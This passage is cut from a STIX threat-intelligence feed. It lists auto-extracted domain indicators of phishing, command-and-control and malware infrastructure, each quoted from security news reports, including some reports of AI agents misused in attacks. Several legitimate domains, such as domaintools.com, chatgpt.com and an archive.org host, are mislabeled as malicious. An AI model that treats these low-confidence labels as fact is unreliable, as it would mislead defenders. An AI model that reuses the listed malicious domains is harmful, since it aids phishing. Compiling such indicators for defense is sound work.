Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91ee5f55-fffb-40a3-9a93-d3035ee95664","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ia601808.us.archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel.jpg After the","pattern":"[domain-name:value = 'ia601808.us.archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b3b0f99-420e-43de-bbee-2b8dc5acf127","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: volmira.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: abA6740d07b . The extension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a93c0218-0989-4d30-9a82-8792a98c944e","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: www.creamp1eonlyfans.net","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not return any content, a","pattern":"[domain-name:value = 'www.creamp1eonlyfans.net']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--302b7a13-e31c-483b-9780-40f0a5485175","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: zaviro.online","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: xtension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2 value was updated on","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35db285d-6378-404a-b0f0-68014ad597b3","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: add-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: keyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com por","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f2e5b0e0-9a1e-4800-bc06-f671badc54af","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: domainlify.net","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads to Cloud Compromi","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6bdc8889-f689-441d-80af-b01374edbb3d","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: integratedsso.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7553990f-0144-46b7-ae06-7f806cb51156","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: oktasession.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting th","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--36da84f3-1d77-4ccf-b48a-ee245d9c821f","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: in the pattern: \"<company name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]c","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d628bfd-cb55-439f-97f1-250bfedd1517","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: portalsetuphub.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: .]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus operandi overlaps with","pattern":"[domain-name:value = 'portalsetuphub.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--931e3ddf-abf8-4444-a5f2-77832af27a3b","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: secure-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: any name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]co","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c84ce53d-ffcc-422e-9b27-cbb2a56fd6b9","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: service-nowinc.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: and individuals. Some of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b10963b3-cf3e-443d-90cc-a395e94e16f7","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: setupmypasskey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com s","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c92c9826-ca9c-40cf-a3bd-e47f37b6a3a8","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: syncmykey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus op","pattern":"[domain-name:value = 'syncmykey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1923de65-367a-4d61-8c94-ce94a42745d0","created":"2026-09-12T10:24:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gemini-advertisers.com","description":"Seen in \"When the Whole Company Adopts AI: What It Does to Your SOC\" (The Hacker News). Context: iated with Google and instead rely on the suspicious domain gemini-advertisers[.]com, indicating a brand impersonation attempt designed to dri","pattern":"[domain-name:value = 'gemini-advertisers.com']","pattern_type":"stix","valid_from":"2026-09-12T10:24:44.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/when-whole-company-adopts-ai-what-it.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e75ae2e8-0547-4a05-9ecc-253e5b969efa","created":"2026-09-12T09:07:56.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: rubydoc.info","description":"Seen in \"OpenAI Agents Linked to RubyGems Campaign That Gained RCE on RubyDoc Servers\" (The Hacker News). Context: The agents are said to have exploited a design quirk in the RubyDoc.info documentation build process to exfiltrate public data from","pattern":"[domain-name:value = 'rubydoc.info']","pattern_type":"stix","valid_from":"2026-09-12T09:07:56.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/openai-agents-linked-to-rubygems.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--beebffb0-18d6-41a5-888e-f37d2326d723","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gitprogram.com","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: address UTA0560 Host associated with cloud.shinewrist[.]net gitprogram[.]com Domain JungleBamboo Phishing, exploit delivery, and C2 in","pattern":"[domain-name:value = 'gitprogram.com']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ec7e5029-d823-4f37-91dc-89bea93fdcc1","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ocr.opusaccel.top","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: 0560 Exploit-hosting and command-and-control infrastructure ocr[.]opusaccel[.]top Domain UTA0560 GRIMWEDGE JScript backdoor C2 endpoint 2","pattern":"[domain-name:value = 'ocr.opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79642ef0-6534-41af-9bf9-c6253b02741f","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: shinewrist.net","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: Compromise Indicator Type Actor Description / SHA256 cloud.shinewrist[.]net Domain UTA0560 Exploit-hosting and command-and-control in","pattern":"[domain-name:value = 'shinewrist.net']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0e00c20-6238-408e-a47f-c0255ec40b87","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: abre.ai","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also investigate suspicious traffic involv","pattern":"[domain-name:value = 'abre.ai']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c295c729-dde9-498a-be33-e3d5c98c8579","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: abrir.link","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: to associated URL-shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also investigate suspiciou","pattern":"[domain-name:value = 'abrir.link']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1348783-21fb-4ab7-b4e7-6322cbaff1cf","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: archivogratuito.online","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: g the victim environment. Mitigation Defenders should block archivogratuito[.]online and monitor or restrict traffic to associated URL-shorten","pattern":"[domain-name:value = 'archivogratuito.online']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d0401f4-255e-48a6-bc58-8f95a3a910e7","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: goo.su","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: ict traffic to associated URL-shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also invest","pattern":"[domain-name:value = 'goo.su']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b729e312-b971-4f17-9fa8-8c5887fe81dc","created":"2026-09-11T20:19:09.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: policenationale.cc","description":"Seen in \"Hackers abused Claude to extract secrets from 1.8M Android apps\" (BleepingComputer). Context: . Anthropic says that 'frkoo' also set up a carding shop at policenationale[.]cc that impersonated the French national police to sell stol","pattern":"[domain-name:value = 'policenationale.cc']","pattern_type":"stix","valid_from":"2026-09-11T20:19:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-abused-claude-to-extract-secrets-from-18m-android-apps/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e18862d6-0def-44a7-843b-9d384be4675c","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: add-passkey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: pdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]c","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90b2dbce-32e2-40f8-bfba-8ad1aa3500bb","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: integratedsso.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: -passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]c","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a93e878-77f0-4f32-9573-d13eed96b13c","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: keysyncos.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: d-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers commonly place the","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7e00ee70-656a-4868-bd8d-92e18678d7c5","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: oktasession.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: mypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers c","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--892a51bb-3e8f-4536-8440-bf8b2320abe0","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: oskeysync.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: gratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers commonly place the victim company's name","pattern":"[domain-name:value = 'oskeysync.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9fbbabb6-ca57-465e-bcc9-bd900f1cebce","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: tity verification. Some examples seen by Microsoft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passk","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--382ad481-271a-4224-a291-f168c571cb9b","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: secure-passkey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: examples seen by Microsoft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedss","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a119a571-bdd2-4729-a299-19f49eba0e90","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: setupmypasskey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: oft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e752456-9af9-4638-9cdd-b6d7c83dfb58","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cdn.quickdelivr.com","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: n of the site’s source shows an external script loaded from cdn[.]quickdelivr[.]com, a domain less than a week old and vaguely resembling t","pattern":"[domain-name:value = 'cdn.quickdelivr.com']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a85605d9-3719-4218-8984-d8e93c81ef85","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: domaintools.com","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: address located in Hong Kong, according to data provided by domaintools.com. Dubey attributed both the fake overlay and clipboard manip","pattern":"[domain-name:value = 'domaintools.com']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--20d7c102-a4aa-4f69-b35d-92882615fa6d","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: stpi.in","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: ector stakeholders. The activity was observed on the ananta.stpi[.]in subdomain by cybersecurity researcher and red teamer Vibh","pattern":"[domain-name:value = 'stpi.in']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2128589f-d648-40d7-bc0b-0644fbdd7416","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chatgpt.com","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: ok conversations: shared, indexable conversations hosted on chatgpt.com and grok.com that can rank for troubleshooting searches. Ea","pattern":"[domain-name:value = 